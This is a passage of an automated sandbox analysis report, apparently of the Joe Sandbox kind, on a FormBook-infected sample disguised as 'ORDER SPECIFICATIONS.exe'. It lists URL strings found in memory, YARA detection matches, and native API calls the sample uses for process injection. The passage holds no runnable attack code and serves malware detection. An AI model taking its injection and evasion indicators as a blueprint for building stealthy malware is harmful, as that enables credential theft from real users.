            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaYn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoitu
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comon
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.come
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Micr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/dn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ico
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.pinterest.com/casarpontocom
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krF
            Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comBR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comtn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comxR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: ORDER SPECIFICATIONS.exe, LogIn.csLong String: Length: 13656
            Source: LvZiFDk.exe.0.dr, LogIn.csLong String: Length: 13656
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.csLong String: Length: 13656
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: ORDER SPECIFICATIONS.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004181B0 NtCreateFile,5_2_004181B0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00418260 NtReadFile,5_2_00418260
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004182E0 NtClose,5_2_004182E0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,5_2_00418390
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004181AB NtCreateFile,5_2_004181AB
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041838A NtAllocateVirtualMemory,5_2_0041838A
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01509910
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015099A0 NtCreateSection,LdrInitializeThunk,5_2_015099A0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509840 NtDelayExecution,LdrInitializeThunk,5_2_01509840
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509860 NtQuerySystemInformation,LdrInitializeThunk,5_2_01509860
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015098F0 NtReadVirtualMemory,LdrInitializeThunk,